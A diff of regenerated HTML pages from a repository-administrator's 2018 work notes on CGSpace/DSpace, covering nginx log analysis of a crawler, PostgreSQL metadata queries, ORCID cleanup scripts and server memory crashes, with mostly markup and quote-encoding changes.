<pre><code>213.139.52.250 - - [10/Jul/2018:13:39:41 +0000] &quot;GET /bitstream/handle/10568/75668/dryad.png HTTP/2.0&quot; 200 53750 &quot;http://localhost:4200/&quot; &quot;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36&quot;
<pre tabindex="0"><code>213.139.52.250 - - [10/Jul/2018:13:39:41 +0000] &#34;GET /bitstream/handle/10568/75668/dryad.png HTTP/2.0&#34; 200 53750 &#34;http://localhost:4200/&#34; &#34;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36&#34;
</code></pre><ul>
<li>He said there was a bug that caused his app to request a bunch of invalid URLs</li>
<li>I&rsquo;ll have to keep and eye on this and see how their platform evolves</li>
@ -349,7 +349,7 @@ org.apache.solr.client.solrj.SolrServerException: IOException occured when talki
<li>Uptime Robot said that CGSpace went down a few times last night, around 10:45 PM and 12:30 AM</li>
<li>Here are the top ten IPs from last night and this morning:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;11/Jul/2018:22&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;11/Jul/2018:22&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
48 66.249.64.91
50 35.227.26.162
57 157.55.39.234
@ -360,7 +360,7 @@ org.apache.solr.client.solrj.SolrServerException: IOException occured when talki
97 183.128.40.185
97 240e:f0:44:fa53:745a:8afe:d221:1232
3634 208.110.72.10
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;12/Jul/2018:00&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;12/Jul/2018:00&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
25 216.244.66.198
38 40.77.167.185
46 66.249.64.93
@ -377,27 +377,27 @@ org.apache.solr.client.solrj.SolrServerException: IOException occured when talki
<li>A brief Google search doesn&rsquo;t turn up any information about what this bot is, but lots of users complaining about it</li>
<li>This bot does make a lot of requests all through the day, although it seems to re-use its Tomcat session:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;Pcore-HTTP&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;Pcore-HTTP&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
17098 208.110.72.10
# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=208.110.72.10' dspace.log.2018-07-11
# grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=208.110.72.10&#39; dspace.log.2018-07-11
1161
# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=208.110.72.10' dspace.log.2018-07-12
# grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=208.110.72.10&#39; dspace.log.2018-07-12
1885
</code></pre><ul>
<li>I think the problem is that, despite the bot requesting <code>robots.txt</code>, it almost exlusively requests dynamic pages from <code>/discover</code>:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;Pcore-HTTP&quot; | grep -o -E &quot;GET /(browse|discover|search-filter)&quot; | sort -n | uniq -c | sort -rn
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;Pcore-HTTP&#34; | grep -o -E &#34;GET /(browse|discover|search-filter)&#34; | sort -n | uniq -c | sort -rn
13364 GET /discover
993 GET /search-filter
804 GET /browse
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;Pcore-HTTP&quot; | grep robots
208.110.72.10 - - [12/Jul/2018:00:22:28 +0000] &quot;GET /robots.txt HTTP/1.1&quot; 200 1301 &quot;https://cgspace.cgiar.org/robots.txt&quot; &quot;Pcore-HTTP/v0.44.0&quot;
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;Pcore-HTTP&#34; | grep robots
208.110.72.10 - - [12/Jul/2018:00:22:28 +0000] &#34;GET /robots.txt HTTP/1.1&#34; 200 1301 &#34;https://cgspace.cgiar.org/robots.txt&#34; &#34;Pcore-HTTP/v0.44.0&#34;
</code></pre><ul>
<li>So this bot is just like Baiduspider, and I need to add it to the nginx rate limiting</li>
<li>I&rsquo;ll also add it to Tomcat&rsquo;s Crawler Session Manager Valve to force the re-use of a common Tomcat sesssion for all crawlers just in case</li>
<li>Generate a list of all affiliations in CGSpace to send to Mohamed Salem to compare with the list on MEL (sorting the list by most occurrences):</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where resource_type_id=2 and metadata_field_id=211 group by text_value order by count desc) to /tmp/affiliations.csv with csv header
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where resource_type_id=2 and metadata_field_id=211 group by text_value order by count desc) to /tmp/affiliations.csv with csv header
COPY 4518
dspace=# \q
$ csvcut -c 1 &lt; /tmp/affiliations.csv &gt; /tmp/affiliations-1.csv
@ -408,7 +408,7 @@ $ csvcut -c 1 &lt; /tmp/affiliations.csv &gt; /tmp/affiliations-1.csv
<ul>
<li>Generate a list of affiliations for Peter and Abenet to go over so we can batch correct them before we deploy the new data visualization dashboard:</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv header;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;affiliation&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv header;
COPY 4518
</code></pre><h2 id="2018-07-15">2018-07-15</h2>
<ul>
@ -420,7 +420,7 @@ COPY 4518
<li>Altmetric help said that <a href="https://cgspace.cgiar.org/oai/request?verb=GetRecord&amp;metadataPrefix=oai_dc&amp;identifier=oai:cgspace.cgiar.org:10568/82810">according to OAI that item is only in one department</a></li>
<li>I noticed that indeed there was only one collection listed, so I forced an OAI re-import on CGSpace:</li>
</ul>
<pre><code>$ dspace oai import -c
<pre tabindex="0"><code>$ dspace oai import -c
OAI 2.0 manager action started
Clearing index
Index cleared
@ -438,19 +438,19 @@ OAI 2.0 manager action ended. It took 697 seconds.
<li>I need to ask the dspace-tech mailing list if the nightly OAI import catches the case of old items that have had metadata or mappings change</li>
<li>ICARDA sent me a list of the ORCID iDs they have in the MEL system and it looks like almost 150 are new and unique to us!</li>
</ul>
<pre><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq | wc -l
1020
$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq | wc -l
1158
</code></pre><ul>
<li>I combined the two lists and regenerated the names for all our the ORCID iDs using my <a href="https://gist.github.com/alanorth/57a88379126d844563c1410bd7b8d12b">resolve-orcids.py</a> script:</li>
</ul>
<pre><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq &gt; /tmp/2018-07-15-orcid-ids.txt
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt; /tmp/2018-07-15-orcid-ids.txt
$ ./resolve-orcids.py -i /tmp/2018-07-15-orcid-ids.txt -o /tmp/2018-07-15-resolved-orcids.txt -d
</code></pre><ul>
<li>Then I added the XML formatting for controlled vocabularies, sorted the list with GNU sort in vim via <code>% !sort</code> and then checked the formatting with tidy:</li>
</ul>
<pre><code>$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
<pre tabindex="0"><code>$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
</code></pre><ul>
<li>I will check with the CGSpace team to see if they want me to add these to CGSpace</li>
<li>Help Udana from WLE understand some Altmetrics concepts</li>
@ -465,16 +465,16 @@ $ ./resolve-orcids.py -i /tmp/2018-07-15-orcid-ids.txt -o /tmp/2018-07-15-resolv
<li>For every day in the past week I only see about 50 to 100 requests per day, but then about nine days ago I see 1500 requsts</li>
<li>In there I see two bots making about 750 requests each, and this one is probably Altmetric:</li>
</ul>
<pre><code>178.33.237.157 - - [09/Jul/2018:17:00:46 +0000] &quot;GET /oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////100 HTTP/1.1&quot; 200 58653 &quot;-&quot; &quot;Apache-HttpClient/4.5.2 (Java/1.8.0_121)&quot;
178.33.237.157 - - [09/Jul/2018:17:01:11 +0000] &quot;GET /oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////200 HTTP/1.1&quot; 200 67950 &quot;-&quot; &quot;Apache-HttpClient/4.5.2 (Java/1.8.0_121)&quot;
<pre tabindex="0"><code>178.33.237.157 - - [09/Jul/2018:17:00:46 +0000] &#34;GET /oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////100 HTTP/1.1&#34; 200 58653 &#34;-&#34; &#34;Apache-HttpClient/4.5.2 (Java/1.8.0_121)&#34;
178.33.237.157 - - [09/Jul/2018:17:01:11 +0000] &#34;GET /oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////200 HTTP/1.1&#34; 200 67950 &#34;-&#34; &#34;Apache-HttpClient/4.5.2 (Java/1.8.0_121)&#34;
...
178.33.237.157 - - [09/Jul/2018:22:10:39 +0000] &quot;GET /oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////73900 HTTP/1.1&quot; 20 0 25049 &quot;-&quot; &quot;Apache-HttpClient/4.5.2 (Java/1.8.0_121)&quot;
178.33.237.157 - - [09/Jul/2018:22:10:39 +0000] &#34;GET /oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////73900 HTTP/1.1&#34; 20 0 25049 &#34;-&#34; &#34;Apache-HttpClient/4.5.2 (Java/1.8.0_121)&#34;
</code></pre><ul>
<li>So if they are getting 100 records per OAI request it would take them 739 requests</li>
<li>I wonder if I should add this user agent to the Tomcat Crawler Session Manager valve&hellip; does OAI use Tomcat sessions?</li>
<li>Appears not:</li>
</ul>
<pre><code>$ http --print Hh 'https://cgspace.cgiar.org/oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////100'
<pre tabindex="0"><code>$ http --print Hh &#39;https://cgspace.cgiar.org/oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////100&#39;
GET /oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////100 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
@ -511,7 +511,7 @@ X-XSS-Protection: 1; mode=block
<li>They say that it is a burden for them to capture the issue dates, so I cautioned them that this is in their own benefit for future posterity and that everyone else on CGSpace manages to capture the issue dates!</li>
<li>For future reference, as I had previously noted in <a href="/cgspace-notes/2018-04/">2018-04</a>, sort options are configured in <code>dspace.cfg</code>, for example:</li>
</ul>
<pre><code>webui.itemlist.sort-option.3 = dateaccessioned:dc.date.accessioned:date
<pre tabindex="0"><code>webui.itemlist.sort-option.3 = dateaccessioned:dc.date.accessioned:date
</code></pre><ul>
<li>Just because I was curious I made sure that these options are working as expected in DSpace 5.8 on DSpace Test (they are)</li>
<li>I tested the Atmire Listings and Reports (L&amp;R) module one last time on my local test environment with a new snapshot of CGSpace&rsquo;s database and re-generated Discovery index and it worked fine</li>
@ -523,17 +523,17 @@ X-XSS-Protection: 1; mode=block
<li>Still discussing dates with IWMI</li>
<li>I looked in the database to see the breakdown of date formats used in <code>dc.date.issued</code>, ie YYYY, YYYY-MM, or YYYY-MM-DD:</li>
</ul>
<pre><code>dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ '^[0-9]{4}$';
<pre tabindex="0"><code>dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ &#39;^[0-9]{4}$&#39;;
count
-------
53292
(1 row)
dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ '^[0-9]{4}-[0-9]{2}$';
dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ &#39;^[0-9]{4}-[0-9]{2}$&#39;;
count
-------
3818
(1 row)
dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ '^[0-9]{4}-[0-9]{2}-[0-9]{2}$';
dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ &#39;^[0-9]{4}-[0-9]{2}-[0-9]{2}$&#39;;
count
-------
17357
@ -569,15 +569,15 @@ dspace=# select count(text_value) from metadatavalue where resource_type_id=2 an
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -46,7 +46,7 @@ Anyways, perhaps I should increase the JVM heap from 5120m to 6144m like we did
The server only has 8GB of RAM so we&rsquo;ll eventually need to upgrade to a larger one because we&rsquo;ll start starving the OS, PostgreSQL, and command line batch processes
I ran all system updates on DSpace Test and rebooted it
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -76,12 +76,12 @@ I ran all system updates on DSpace Test and rebooted it
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -127,7 +127,7 @@ I ran all system updates on DSpace Test and rebooted it
<p class="blog-post-meta">
<time datetime="2018-08-01T11:52:54+03:00">Wed Aug 01, 2018</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -136,7 +136,7 @@ I ran all system updates on DSpace Test and rebooted it
<ul>
<li>DSpace Test had crashed at some point yesterday morning and I see the following in <code>dmesg</code>:</li>
</ul>
<pre><code>[Tue Jul 31 00:00:41 2018] Out of memory: Kill process 1394 (java) score 668 or sacrifice child
<pre tabindex="0"><code>[Tue Jul 31 00:00:41 2018] Out of memory: Kill process 1394 (java) score 668 or sacrifice child
[Tue Jul 31 00:00:41 2018] Killed process 1394 (java) total-vm:15601860kB, anon-rss:5355528kB, file-rss:0kB, shmem-rss:0kB
[Tue Jul 31 00:00:41 2018] oom_reaper: reaped process 1394 (java), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
</code></pre><ul>
@ -161,7 +161,7 @@ I ran all system updates on DSpace Test and rebooted it
<ul>
<li>DSpace Test crashed again and I don&rsquo;t see the only error I see is this in <code>dmesg</code>:</li>
</ul>
<pre><code>[Thu Aug 2 00:00:12 2018] Out of memory: Kill process 1407 (java) score 787 or sacrifice child
<pre tabindex="0"><code>[Thu Aug 2 00:00:12 2018] Out of memory: Kill process 1407 (java) score 787 or sacrifice child
[Thu Aug 2 00:00:12 2018] Killed process 1407 (java) total-vm:18876328kB, anon-rss:6323836kB, file-rss:0kB, shmem-rss:0kB
</code></pre><ul>
<li>I am still assuming that this is the Tomcat process that is dying, so maybe actually we need to reduce its memory instead of increasing it?</li>
@ -179,13 +179,13 @@ I ran all system updates on DSpace Test and rebooted it
<li>I did some quick sanity checks and small cleanups in Open Refine, checking for spaces, weird accents, and encoding errors</li>
<li>Finally I did a test run with the <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897"><code>fix-metadata-value.py</code></a> script:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i 2018-08-15-Correct-1083-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t correct -m 211
$ ./delete-metadata-values.py -i 2018-08-15-Remove-11-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2018-08-15-Correct-1083-Affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -t correct -m 211
$ ./delete-metadata-values.py -i 2018-08-15-Remove-11-Affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211
</code></pre><h2 id="2018-08-16">2018-08-16</h2>
<ul>
<li>Generate a list of the top 1,500 authors on CGSpace for Sisay so he can create the controlled vocabulary:</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc limit 1500) to /tmp/2018-08-16-top-1500-authors.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc limit 1500) to /tmp/2018-08-16-top-1500-authors.csv with csv;
</code></pre><ul>
<li>Start working on adding the ORCID metadata to a handful of CIAT authors as requested by Elizabeth earlier this month</li>
<li>I might need to overhaul the <a href="https://gist.github.com/alanorth/a49d85cd9c5dea89cddbe809813a7050">add-orcid-identifiers-csv.py</a> script to be a little more robust about author order and ORCID metadata that might have been altered manually by editors after submission, as this script was written without that consideration</li>
@ -195,21 +195,21 @@ $ ./delete-metadata-values.py -i 2018-08-15-Remove-11-Affiliations.csv -db dspac
<li>I will have to update my script to extract the ORCID identifier and search for that</li>
<li>Re-create my local DSpace database using the latest PostgreSQL 9.6 Docker image and re-import the latest CGSpace dump:</li>
</ul>
<pre><code>$ sudo docker run --name dspacedb -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
<pre tabindex="0"><code>$ sudo docker run --name dspacedb -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
$ createuser -h localhost -U postgres --pwprompt dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest ~/Downloads/cgspace_2018-08-16.backup
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
</code></pre><h2 id="2018-08-19">2018-08-19</h2>
<ul>
<li>Keep working on the CIAT ORCID identifiers from Elizabeth</li>
<li>In the spreadsheet she sent me there are some names with other versions in the database, so when it is obviously the same one (ie &ldquo;Schultze-Kraft, Rainer&rdquo; and &ldquo;Schultze-Kraft, R.&quot;) I will just tag them with ORCID identifiers too</li>
<li>In the spreadsheet she sent me there are some names with other versions in the database, so when it is obviously the same one (ie &ldquo;Schultze-Kraft, Rainer&rdquo; and &ldquo;Schultze-Kraft, R.&rdquo;) I will just tag them with ORCID identifiers too</li>
<li>This is less obvious and more error prone with names like &ldquo;Peters&rdquo; where there are many more authors</li>
<li>I see some errors in the variations of names as well, for example:</li>
</ul>
<pre><code>Verchot, Louis
<pre tabindex="0"><code>Verchot, Louis
Verchot, L
Verchot, L. V.
Verchot, L.V
@ -220,44 +220,44 @@ Verchot, Louis V.
<li>I&rsquo;ll just tag them all with Louis Verchot&rsquo;s ORCID identifier&hellip;</li>
<li>In the end, I&rsquo;ll run the following CSV with my <a href="https://gist.github.com/alanorth/a49d85cd9c5dea89cddbe809813a7050">add-orcid-identifiers-csv.py</a> script:</li>
</ul>
<pre><code>dc.contributor.author,cg.creator.id
&quot;Campbell, Bruce&quot;,Bruce M Campbell: 0000-0002-0123-4859
&quot;Campbell, Bruce M.&quot;,Bruce M Campbell: 0000-0002-0123-4859
&quot;Campbell, B.M&quot;,Bruce M Campbell: 0000-0002-0123-4859
&quot;Peters, Michael&quot;,Michael Peters: 0000-0003-4237-3916
&quot;Peters, M.&quot;,Michael Peters: 0000-0003-4237-3916
&quot;Peters, M.K.&quot;,Michael Peters: 0000-0003-4237-3916
&quot;Tamene, Lulseged&quot;,Lulseged Tamene: 0000-0002-3806-8890
&quot;Desta, Lulseged Tamene&quot;,Lulseged Tamene: 0000-0002-3806-8890
&quot;Läderach, Peter&quot;,Peter Läderach: 0000-0001-8708-6318
&quot;Lundy, Mark&quot;,Mark Lundy: 0000-0002-5241-3777
&quot;Schultze-Kraft, Rainer&quot;,Rainer Schultze-Kraft: 0000-0002-4563-0044
&quot;Schultze-Kraft, R.&quot;,Rainer Schultze-Kraft: 0000-0002-4563-0044
&quot;Verchot, Louis&quot;,Louis Verchot: 0000-0001-8309-6754
&quot;Verchot, L&quot;,Louis Verchot: 0000-0001-8309-6754
&quot;Verchot, L. V.&quot;,Louis Verchot: 0000-0001-8309-6754
&quot;Verchot, L.V&quot;,Louis Verchot: 0000-0001-8309-6754
&quot;Verchot, L.V.&quot;,Louis Verchot: 0000-0001-8309-6754
&quot;Verchot, LV&quot;,Louis Verchot: 0000-0001-8309-6754
&quot;Verchot, Louis V.&quot;,Louis Verchot: 0000-0001-8309-6754
&quot;Mukankusi, Clare&quot;,Clare Mukankusi: 0000-0001-7837-4545
&quot;Mukankusi, Clare M.&quot;,Clare Mukankusi: 0000-0001-7837-4545
&quot;Wyckhuys, Kris&quot;,Kris Wyckhuys: 0000-0003-0922-488X
&quot;Wyckhuys, Kris A. G.&quot;,Kris Wyckhuys: 0000-0003-0922-488X
&quot;Wyckhuys, Kris A.G.&quot;,Kris Wyckhuys: 0000-0003-0922-488X
&quot;Chirinda, Ngonidzashe&quot;,Ngonidzashe Chirinda: 0000-0002-4213-6294
&quot;Chirinda, Ngoni&quot;,Ngonidzashe Chirinda: 0000-0002-4213-6294
&quot;Ngonidzashe, Chirinda&quot;,Ngonidzashe Chirinda: 0000-0002-4213-6294
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&#34;Campbell, Bruce&#34;,Bruce M Campbell: 0000-0002-0123-4859
&#34;Campbell, Bruce M.&#34;,Bruce M Campbell: 0000-0002-0123-4859
&#34;Campbell, B.M&#34;,Bruce M Campbell: 0000-0002-0123-4859
&#34;Peters, Michael&#34;,Michael Peters: 0000-0003-4237-3916
&#34;Peters, M.&#34;,Michael Peters: 0000-0003-4237-3916
&#34;Peters, M.K.&#34;,Michael Peters: 0000-0003-4237-3916
&#34;Tamene, Lulseged&#34;,Lulseged Tamene: 0000-0002-3806-8890
&#34;Desta, Lulseged Tamene&#34;,Lulseged Tamene: 0000-0002-3806-8890
&#34;Läderach, Peter&#34;,Peter Läderach: 0000-0001-8708-6318
&#34;Lundy, Mark&#34;,Mark Lundy: 0000-0002-5241-3777
&#34;Schultze-Kraft, Rainer&#34;,Rainer Schultze-Kraft: 0000-0002-4563-0044
&#34;Schultze-Kraft, R.&#34;,Rainer Schultze-Kraft: 0000-0002-4563-0044
&#34;Verchot, Louis&#34;,Louis Verchot: 0000-0001-8309-6754
&#34;Verchot, L&#34;,Louis Verchot: 0000-0001-8309-6754
&#34;Verchot, L. V.&#34;,Louis Verchot: 0000-0001-8309-6754
&#34;Verchot, L.V&#34;,Louis Verchot: 0000-0001-8309-6754
&#34;Verchot, L.V.&#34;,Louis Verchot: 0000-0001-8309-6754
&#34;Verchot, LV&#34;,Louis Verchot: 0000-0001-8309-6754
&#34;Verchot, Louis V.&#34;,Louis Verchot: 0000-0001-8309-6754
&#34;Mukankusi, Clare&#34;,Clare Mukankusi: 0000-0001-7837-4545
&#34;Mukankusi, Clare M.&#34;,Clare Mukankusi: 0000-0001-7837-4545
&#34;Wyckhuys, Kris&#34;,Kris Wyckhuys: 0000-0003-0922-488X
&#34;Wyckhuys, Kris A. G.&#34;,Kris Wyckhuys: 0000-0003-0922-488X
&#34;Wyckhuys, Kris A.G.&#34;,Kris Wyckhuys: 0000-0003-0922-488X
&#34;Chirinda, Ngonidzashe&#34;,Ngonidzashe Chirinda: 0000-0002-4213-6294
&#34;Chirinda, Ngoni&#34;,Ngonidzashe Chirinda: 0000-0002-4213-6294
&#34;Ngonidzashe, Chirinda&#34;,Ngonidzashe Chirinda: 0000-0002-4213-6294
</code></pre><ul>
<li>The invocation would be:</li>
</ul>
<pre><code>$ ./add-orcid-identifiers-csv.py -i 2018-08-16-ciat-orcid.csv -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2018-08-16-ciat-orcid.csv -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>I ran the script on DSpace Test and CGSpace and tagged a total of 986 ORCID identifiers</li>
<li>Looking at the list of author affialitions from Peter one last time</li>
<li>I notice that I should add the Unicode character 0x00b4 (`) to my list of invalid characters to look for in Open Refine, making the latest version of the GREL expression being:</li>
</ul>
<pre><code>or(
<pre tabindex="0"><code>or(
isNotNull(value.match(/.*\uFFFD.*/)),
isNotNull(value.match(/.*\u00A0.*/)),
isNotNull(value.match(/.*\u200A.*/)),
@ -268,12 +268,12 @@ Verchot, Louis V.
<li>This character all by itself is indicative of encoding issues in French, Italian, and Spanish names, for example: De´veloppement and Investigacio´n</li>
<li>I will run the following on DSpace Test and CGSpace:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/2018-08-15-Correct-1083-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t correct -m 211
$ ./delete-metadata-values.py -i /tmp/2018-08-15-Remove-11-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-08-15-Correct-1083-Affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -t correct -m 211
$ ./delete-metadata-values.py -i /tmp/2018-08-15-Remove-11-Affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211
</code></pre><ul>
<li>Then force an update of the Discovery index on DSpace Test:</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx512m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx512m&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 72m12.570s
@ -282,7 +282,7 @@ sys 2m2.461s
</code></pre><ul>
<li>And then on CGSpace:</li>
</ul>
